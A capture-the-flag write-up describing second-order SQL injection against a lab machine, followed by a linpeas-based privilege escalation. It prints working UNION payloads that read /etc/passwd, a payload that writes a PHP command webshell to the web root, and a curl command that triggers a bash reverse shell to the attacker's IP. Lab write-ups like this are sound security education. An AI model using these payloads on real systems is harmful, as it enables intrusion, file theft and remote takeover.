Summary
This was an amazing machine created by ippsec that required "second order" SQL injection. This provides the surface area to inject a webshell that interacts with system commands in the back end and we can execute a bash reverse shell. From here the initial user foothold allows for a file transfer of linpeas. Following this we are able to find a password in the /var/www/html config.php file.
Tools used
Burpsuite
Linpeas
Process / techniques
SQL injection
SQL second order injection
Command injection
Webshell injection with PHP SQL
References:
Enumeration
We start off with a basic nmap scan that provides many ports but only few are open. The filtered ports are probably not open or being blocked by the firewall. In order to be diligent I will start autorecon in the background to find any information I may miss during this process.
A second and more in-depth scan with the -sC and -sV flags yields some helpful information. In particular we find that our webserver is running Apache httpd 2.4.48 which is very up to date. Port 8080 is running nginx but responds 502.
-sC: Use default nmap enumeration scripts
-sV: Enumerate service versions in particular
Website Enumeration
Jumping into the website on port 80 we see a very basic landing page with an immediate form. So this is pretty indicative that we need to conduct web form enumeration.
Lest start with some basic checks.
Dirbusting
Subdomain enumeration
Platform version
Page forms
SQL Injection flow
Enumerating for SQL injection is imperative when presented with a web form. Here we are fortunate to work through an SQL problem that deals with second order SQL injection, which is a treat in the CTF/security world as it is rare. By virtue of being uncommon, it can be difficult, but the concept and practical application is rather lite as basic SQL injection.
Here is our processes and workflow for the SQL injection, for enumeration to our reverse shell.
Single quote error based testing
Payload testing
Enumerate versions
user()
Read file
Write file - shell.php
Execute a reverse shell
1. Error based testing is a great way to start off our SQL enumeration. We start by dropping a single quote to see if there is an error or not. We of course see there is an error that reveals the web service is running out of the /var/www/html directory.
2. Payload testing: Here we pass common SQL payloads appended to our single quote. We know that our single quote is not being handled properly. We see that our data is stored in the backend and pushed to the front end on logging in. This is suggestive of second order SQL injection. We start dropping various payloads with a particular focus on a union attacks as we know our register form has 2 fields and is likely relying on a SQL Union statement.
Reference:
https://github.com/payloadbox/sql-injection-payload-list
3. Enumerate version Here we send a post form as user aaa and country Brazil. We intercept the request in Burpsuite and add a quote followed by UNION SELECT @@version ' to reveal the particular sql DB, Maria.
4. user()
username=aaa&country=Brazil ' UNION SELECT user()'
5. readfile
username=aaa&country=Brazil ' UNION SELECT LOAD_FILE("/etc/passwd")'
6.write file - shell.php
Test with normal file: username=aaa&country=Brazil' UNION SELECT "<?php booom ?>" INTO OUTFILE '/var/www/html/boom.php'-- -
username=aaa&country=Brazil' UNION SELECT "<?php SYSTEM($_REQUEST['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'-- -
7. Execute a reverse shell
curl 10.129.95.235/shell.php --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/10.10.16.44/6363 0>&1"'
The above is passed to the target backend host which passes the command line arguments to bash, and we successfully execute a bash reverse shell to our lisenter.
Root
As usual we start off by transferring the linpeas enumeration script to our target machine. This is performed by first spinning up a python3 simple http server from the linpeas directory. This file server runs over port 8000 by default.
Once linpeas is uploaded we proceed to look through the output and make note of our top 10 noticeable possible privillege escalation artifacts.
Comments